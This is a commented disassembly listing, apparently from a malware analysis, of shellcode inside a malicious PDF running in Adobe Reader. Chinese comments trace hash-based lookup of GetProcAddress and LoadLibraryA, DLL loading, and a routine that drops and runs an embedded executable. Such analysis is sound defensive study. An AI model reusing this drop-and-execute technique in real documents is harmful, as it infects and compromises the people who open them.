07FF04CF 8BF8 MOV EDI,EAX //保存eax
07FF04D1 6A 00 PUSH 0
07FF04D3 8B43 0E MOV EAX,DWORD PTR DS:[EBX+E] //取hash值
07FF04D6 50 PUSH EAX
07FF04D7 57 PUSH EDI
07FF04D8 E8 DCFBFFFF CALL 07FF00B9
//调用过程07FF00B9定位GetProcAddress地址
07FF04DD 8BF0 MOV ESI,EAX //保存在esi
07FF04DF 8973 0E MOV DWORD PTR DS:[EBX+E],ESI //
07FF04E2 85F6 TEST ESI,ESI
07FF04E4 74 67 JE SHORT 07FF054D //跳转未实现
07FF04E6 56 PUSH ESI
07FF04E7 8B43 0A MOV EAX,DWORD PTR DS:[EBX+A] //取hash值
07FF04EA 50 PUSH EAX
07FF04EB 57 PUSH EDI
07FF04EC E8 C8FBFFFF CALL 07FF00B9
//调用过程07FF00B9定位LoadLibraryA地址
07FF04F1 8943 0A MOV DWORD PTR DS:[EBX+A],EAX
07FF04F4 837B 0A 00 CMP DWORD PTR DS:[EBX+A],0
07FF04F8 74 53 JE SHORT 07FF054D //跳转未实现
07FF04FA 8D43 01 LEA EAX,DWORD PTR DS:[EBX+1] //eax为"kernel32"
07FF04FD 8945 00 MOV DWORD PTR SS:[EBP],EAX
07FF0500 EB 42 JMP SHORT 07FF0544 //跳转至07FF0544
07FF0502 8B45 00 MOV EAX,DWORD PTR SS:[EBP]
//该过程可重用,实现加载不同DLL
07FF0505 E8 23FBFFFF CALL 07FF002D
//获取"kernel32"的长度并保存在eax中
07FF050A 894424 08 MOV DWORD PTR SS:[ESP+8],EAX
07FF050E 8B45 00 MOV EAX,DWORD PTR SS:[EBP]
07FF0511 50 PUSH EAX //kernel32
07FF0512 FF53 0A CALL DWORD PTR DS:[EBX+A]
//调用LoadLibraryA加载kernel32.dll
07FF0515 8BF8 MOV EDI,EAX
07FF0517 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
07FF051B 40 INC EAX
07FF051C 0145 00 ADD DWORD PTR SS:[EBP],EAX
07FF051F EB 14 JMP SHORT 07FF0535 //跳转实现
07FF0521 8B43 0E MOV EAX,DWORD PTR DS:[EBX+E]
07FF0524 50 PUSH EAX
07FF0525 56 PUSH ESI
07FF0526 57 PUSH EDI
07FF0527 E8 8DFBFFFF CALL 07FF00B9
//调用过程07FF00B9定位所有使用的API地址
07FF052C 8B55 00 MOV EDX,DWORD PTR SS:[EBP]
07FF052F 8902 MOV DWORD PTR DS:[EDX],EAX
07FF0531 8345 00 04 ADD DWORD PTR SS:[EBP],4
07FF0535 8B45 00 MOV EAX,DWORD PTR SS:[EBP]
07FF0538 8B30 MOV ESI,DWORD PTR DS:[EAX]
07FF053A 85F6 TEST ESI,ESI
07FF053C ^ 75 E3 JNZ SHORT 07FF0521
//跳转07FF0521直到API都定位完毕
07FF053E 8345 00 04 ADD DWORD PTR SS:[EBP],4
07FF0542 FE0B DEC BYTE PTR DS:[EBX]
07FF0544 803B 00 CMP BYTE PTR DS:[EBX],0
07FF0547 ^ 77 B9 JA SHORT 07FF0502
//跳转加载"shell32"动态链接库
07FF0549 C60424 01 MOV BYTE PTR SS:[ESP],1
07FF054D 8A0424 MOV AL,BYTE PTR SS:[ESP]
07FF0550 83C4 0C ADD ESP,0C
07FF0553 5D POP EBP
07FF0554 5F POP EDI
07FF0555 5E POP ESI
07FF0556 5B POP EBX
07FF0557 C3 RETN //跳转至07FF0583
07FF0558 90 NOP
07FF0559 55 PUSH EBP //shellcode入口位置
07FF055A 8BEC MOV EBP,ESP
07FF055C 81C4 00FEFFFF ADD ESP,-200 //抬高栈空间
07FF0562 E8 00000000 CALL 07FF0567 //下一句07FF0567
07FF0567 58 POP EAX //保存当前位置
07FF0568 2D 463E4000 SUB EAX,403E46
07FF056D 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
07FF0570 B8 AC3E4000 MOV EAX,403EAC
07FF0575 0345 FC ADD EAX,DWORD PTR SS:[EBP-4]
07FF0578 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
07FF057B 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
07FF057E E8 36FFFFFF CALL 07FF04B9 //跳07FF04B9
07FF0583 84C0 TEST AL,AL
07FF0585 74 40 JE SHORT 07FF05C7 //跳转未实现
07FF0587 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
07FF058A FF50 32 CALL DWORD PTR DS:[EAX+32]
//调用GetCommandLineA->AcroRd32.exe
07FF058D E8 17FCFFFF CALL 07FF01A9
07FF0592 E8 12FCFFFF CALL 07FF01A9
07FF0597 8BD0 MOV EDX,EAX
07FF0599 8D85 03FEFFFF LEA EAX,DWORD PTR SS:[EBP-1FD]
07FF059F E8 21FCFFFF CALL 07FF01C5
07FF05A4 8D95 03FEFFFF LEA EDX,DWORD PTR SS:[EBP-1FD]
07FF05AA B9 01000000 MOV ECX,1
07FF05AF 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
07FF05B2 E8 AEFCFFFF CALL 07FF0265 //释放exe并运行
07FF05B7 8D95 03FEFFFF LEA EDX,DWORD PTR SS:[EBP-1FD]
07FF05BD 33C9 XOR ECX,ECX
07FF05BF 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
07FF05C2 E8 9EFCFFFF CALL 07FF0265
//这里再调用释放pdf并执行可惜进去后出错,不过exe已经执行!也算可以交差!
07FF05C7 8BE5 MOV ESP,EBP
07FF05C9 5D POP EBP
07FF05CA C3 RETN